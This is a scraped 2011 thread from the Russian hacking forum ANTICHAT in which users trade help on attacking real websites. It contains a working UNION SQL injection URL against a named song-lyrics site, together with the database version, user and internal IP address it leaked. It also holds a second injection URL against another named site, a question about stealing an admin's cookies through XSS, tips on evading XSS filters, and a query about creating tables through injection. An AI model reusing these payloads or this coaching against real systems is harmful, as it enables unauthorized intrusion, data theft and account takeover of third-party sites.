ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.08.2011, 21:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
60692
Репутация:
6
|
|
FlaktW,
blind...
Как крутить при таком случае:
Код:
Code:
http://www.textsongs.ru/search/?name=%27
p.s. просьба не цитировать мое сообщение...
|
|
|
|
30.08.2011, 22:00
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Как крутить при таком случае:
Код:
Code:
http://www.textsongs.ru/search/?name=%27
Вот так!
Сообщение от None
http://www.textsongs.ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cco ncat_ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2C user%28%29%2C%40%40version_compile_os%29%2C3%2C4%2 C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2 C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2 C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2 C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2 C56%2C57%2C58%29%23
5.0.77-log: peoplesru:alex192@192.168.0.162:redhat-linux-gnu |
|
|
31.08.2011, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
8471
Репутация:
1
|
|
Вопрос: Чтобы угнать ак админа нужно спирить у его куки, чтобы забрать куки нужно снифер, чтобы снифер заберал куки нужно xss уязвимость, чтобы найти уязвимость нужно посетить сайт античат. Я все правельно понял? или здесь чтото нетак? И как поподробней использувать xss со снифером если можно ссилки на мануалы
|
|
|
|
31.08.2011, 02:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
2~{OmRus}~
/thread20140.html
|
|
|
|
01.09.2011, 20:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
http://finclub.perm.ru/?show=561064292&news_id=-815805698+union+select+1,2,user(),4,version(),6,7, 8 не могу подобрать таблицы. 4 ветка.
|
|
|
|
01.09.2011, 21:59
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от None
http://kostomuksha-city.ru/test/ebanucca.php
это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?
|
|
|
|
01.09.2011, 22:12
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от vaddd
vaddd said:
это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?
SCRIPT_FILENAME /pub/home/***/new/htdocs/test.php
|
|
|
|
01.09.2011, 23:35
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350
Репутация:
0
|
|
на сайте имеется XSS
проходят подставки типа hack и пр.
а
alert('hack') не канает, как дальше двигать подскажите
|
|
|
|
01.09.2011, 23:51
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091
Репутация:
2
|
|
Сообщение от foozzi
foozzi said:
на сайте имеется XSS
проходят подставки типа hack и пр.
а
alert('hack') не канает, как дальше двигать подскажите
Смотри что как фильтруется, поиграй символами, я пару раз видел фильтры, которые вырезают , спасало что-то типа ipt>
/thread20140.html советую к ознакомлению
|
|
|
|
02.09.2011, 02:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
657
Репутация:
0
|
|
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
ili kak voobshe delat create table cherez injekciu, zaranee spasibo
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
